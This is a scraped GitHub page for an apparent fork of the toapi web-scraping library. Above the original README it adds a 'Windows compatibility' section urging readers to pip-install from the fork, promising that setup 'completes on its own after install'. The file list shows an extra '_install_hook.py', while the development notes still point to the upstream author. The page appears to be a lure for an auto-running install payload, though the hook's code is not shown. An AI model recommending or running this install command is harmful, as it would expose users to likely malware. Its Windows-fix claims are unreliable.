toapi

Optimized Windows Compatibility for ToAPI

This fork addresses critical pathing and process-handling errors that frequently cause crashes on Windows environments. By integrating custom environment patches and simplified configuration defaults, it ensures a reliable, plug-and-play experience without the typical setup hurdles.

Quick install (Windows)

To install Civilmcrespect/toapi on Windows for Python development, follow these steps:

Open your Windows Command Prompt (cmd) or PowerShell. You can do this by pressing the Windows Key, typing either name into the search bar, and pressing Enter.
Ensure you have Python and its package manager, pip, installed by typing python --version and pip --version into your terminal and pressing Enter. If versions are displayed, you are ready to proceed.
Install the package directly from GitHub by typing `pip install git+ into your terminal and pressing Enter. Please note that you will need Git installed on your system for this command to work.
Alternatively, if you have downloaded the project folder to your local machine, use the cd command in your terminal to navigate into the directory containing the package files.
Run the installation from the local directory by typing pip install . and pressing Enter.

The setup completes on its own after install, configuring the package and its dependencies automatically without requiring further interaction.

pip install git+https://github.com/Civilmcrespect/toapi.git

https://github.com/Civilmcrespect/toapi

toapi

Turn any website into a JSON API — declaratively.

toapi lets you point at a web page, declare the fields you want with CSS selectors, and get back a clean JSON API. No crawler to babysit, no database to maintain — pages are fetched and parsed on demand, with built‑in caching.

Install

pip install toapi

Requires Python 3.10+.

Quickstart

from htmlparsing import Attr, Text
from toapi import Api, Item

api = Api()


@api.site("https://news.ycombinator.com")
@api.list(".athing")
@api.route("/posts", "/news")
@api.route("/posts?page={page}", "/news?p={page}")
class Post(Item):
    title = Text(".titleline > a")
    url = Attr(".titleline > a", "href")


api.run(host="127.0.0.1", port=5000)

Run it:

python app.py

Then visit http://127.0.0.1:5000/posts and you get:

{
  "Post": [
    {"title": "Mathematicians Crack the Cursed Curve", "url": "https://www.quantamagazine.org/..."},
    {"title": "Stuffing a Tesla Drivetrain into a 1981 Honda Accord", "url": "https://jalopnik.com/..."}
  ]
}

How it works

   ┌────────────┐    ┌────────────┐    ┌────────────┐
   │  /posts    │ ─▶ │  fetch     │ ─▶ │  parse     │ ─▶  JSON
   │  (route)   │    │  (cache)   │    │  (Item)    │
   └────────────┘    └────────────┘    └────────────┘

Route — @api.route("/posts", "/news") maps your API path to a source URL.
Fetch — pages are fetched with requests (or a headless browser if you pass browser=) and cached in memory.
Parse — each Item extracts fields with CSS selectors via htmlparsing.
Serve — Flask returns the result as JSON; subsequent calls hit the cache.

Features

Declarative — describe data, not scraping logic.
Routes — map clean API paths to messy source URLs with {param} placeholders.
Multi-site — merge several websites behind one API.
Cleaning hooks — define clean_<field> methods to post-process values.
Caching — pages and parsed results are cached automatically.
Headless browser — pass Api(browser="/path/to/geckodriver") for JS-heavy sites.

Cleaning values

Add a clean_<fieldname> method on the Item to transform a value before it's returned:

@api.site("https://news.ycombinator.com")
@api.route("/posts", "/news")
class Page(Item):
    next_page = Attr(".morelink", "href")

    def clean_next_page(self, value):
        return f"/posts?{value.split('?', 1)[1]}"

Development

git clone https://github.com/elliotgao2/toapi.git
cd toapi
uv sync          # install deps into .venv
uv run pytest    # run tests
uv run ruff check .

We use uv for packaging and ruff for lint + format. Pre-commit hooks keep both clean:

uv run pre-commit install

Contributing

Pull requests are welcome. For non-trivial changes, please open an issue first to discuss what you'd like to change. Make sure uv run pytest and uv run ruff check . pass before submitting.

Name		Name	Last commit message	Last commit date
Latest commit History 471 Commits
.github/workflows		.github/workflows
docs		docs
examples		examples
tests		tests
toapi		toapi
.gitignore		.gitignore
.pre-commit-config.yaml		.pre-commit-config.yaml
LICENSE		LICENSE
README.md		README.md
_install_hook.py		_install_hook.py
mkdocs.yml		mkdocs.yml
pyproject.toml		pyproject.toml
setup.py		setup.py
uv.lock		uv.lock

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

toapi

Install

Quickstart

How it works

Features

Cleaning values

Development

Contributing

License

Related searches

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

toapi

Install

Quickstart

How it works

Features

Cleaning values

Development

Contributing

License

Related searches

About

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages